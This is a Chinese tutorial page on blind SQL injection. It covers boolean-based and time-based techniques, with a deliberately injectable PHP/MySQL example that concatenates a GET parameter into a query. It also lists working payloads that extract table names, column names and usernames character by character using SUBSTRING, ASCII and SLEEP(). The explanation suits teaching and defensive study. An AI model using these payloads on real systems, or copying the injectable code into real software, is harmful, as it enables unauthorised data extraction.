当前位置: 首页 > wzjs >正文

专题网站建设策划免费友情链接交换平台

wzjs 2025/7/25 9:26:11
专题网站建设策划,免费友情链接交换平台,西安保洁公司网站建设,北京微信网站建设公司一. 布尔盲注 布尔盲注是通过观察应用程序的响应&#xff08;如HTTP 状态码等&#xff09;来判断查询条件是否为真。 1.进行数据库配置连接 <?php // 数据库连接配置 $host localhost; $dbname testdb; $user root; $password password;$conn new mysqli($host, $us…

一. 布尔盲注
布尔盲注是通过观察应用程序的响应(如HTTP 状态码等)来判断查询条件是否为真。

1.进行数据库配置连接
<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';$conn = new mysqli($host, $user, $password, $dbname);if ($conn->connect_error) {die("Connection failed: " . $conn->connect_error);
}// 获取用户输入的参数
$id = $_GET['id'];
2.构造布尔盲注查询
$query = "SELECT * FROM users WHERE id = $id AND 1=1";$result = $conn->query($query);
3.返回查询结果
if ($result->num_rows > 0) {echo "Query is TRUE (数据存在)";
} else {echo "Query is FALSE (数据不存在)";
}// 关闭连接
$conn->close();
?>
4.攻击者可以通过修改 `id` 参数,一点点推断数据库信息

获取表名:

sqlid=1 AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a'


获取列名:

sqlid=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'


获取数据:

sqlid=1 AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'

二. 时间盲注
时间盲注是通过在 SQL 查询中插入时间延迟函数(如 `SLEEP()`),根据数据库响应时间来判断查询条件是否为真。

1.数据库配置连接与布尔盲注相同
2.构造时间盲注查询
$query = "SELECT * FROM users WHERE id = $id AND IF(1=1, SLEEP(5), 0)";
$start_time = microtime(true); // 开始时间
$result = $conn->query($query);
$end_time = microtime(true); // 结束时间
3. 计算查询耗时
$query_time = $end_time - $start_time;
4.根据查询时间判断结果
if ($query_time > 5) {echo "Query is TRUE (延迟 5 秒)";
} else {echo "Query is FALSE (无延迟)";
}
// 关闭连接
$conn->close();
?>
5.攻击者可以通过修改 `id` 参数,逐步推断数据库信息

获取表名:

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),1,1))=97, SLEEP(5), 0)


获取列名:

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)


获取数据: 

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97, SLEEP(5), 0)

三.获取表,列,具体数据的函数

1:获取表名

使用布尔盲注或时间盲注,逐个字符推断表名。
 

sqlid=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0),1,1))=97

 

2:获取列名

使用布尔盲注或时间盲注,逐个字符推断列名。
 

sqlid=1 AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1 OFFSET 0),1,1))=117
3:获取数据
sqlid=1 AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1))=97
http://www.dtcms.com/wzjs/72647.html

相关文章:

  • 网站和网页的区别搜索引擎营销方案
  • 设计网络培训sem优化是什么
  • 电力建设工程质量监督总网站培训网站排名
  • 泉州建设网站营销软文范文200字
  • 什么网站专做秒杀微商软文范例大全100
  • 私人公司怎么做网站口碑营销渠道
  • 宁波模板建站定制自媒体营销代理
  • 武汉做网站优化的公司外贸网站推广平台有哪些
  • 六盘水南宁网站建设长沙网络科技有限公司
  • ui设计方向网站建设目标网站营销策划公司
  • 网站建设仟首先金手指14百度收录网站要多久
  • 深圳网站建设fantodo如何发布一个网站
  • 怎么删除织梦做的网站广告联盟有哪些平台
  • 做网站推广运营前景西安seo哪家好
  • 网站可以跳转备案吗网站关键词优化推广哪家快
  • 网站广告费怎么做分录百度seo推广首选帝搜软件
  • 代刷网网站怎么做长沙网站包年优化
  • 合肥营销型网站建设公司西安网站开发制作公司
  • 网站搜索框如何做hao123影视
  • 网站建设税点发票百度入驻绍兴
  • 网站建和优网站建设免费的行情网站app软件
  • 四川城乡建设官方网站广告推广计划
  • 网站域名做跳转要收费吗适合seo的网站
  • 温州科技网站建设网站关键词优化怎么做的
  • div+css网站模版下载推广普通话的意义50字
  • 简述网站建设的标准关键词查询
  • 个人网站制作dw百度关键词怎么刷上去
  • 河南网站建站系统哪家好枣庄网站seo
  • 中小型网站建设价格手机网站怎么优化
  • 网站服务器租赁你的知识宝库免费二级域名查询网站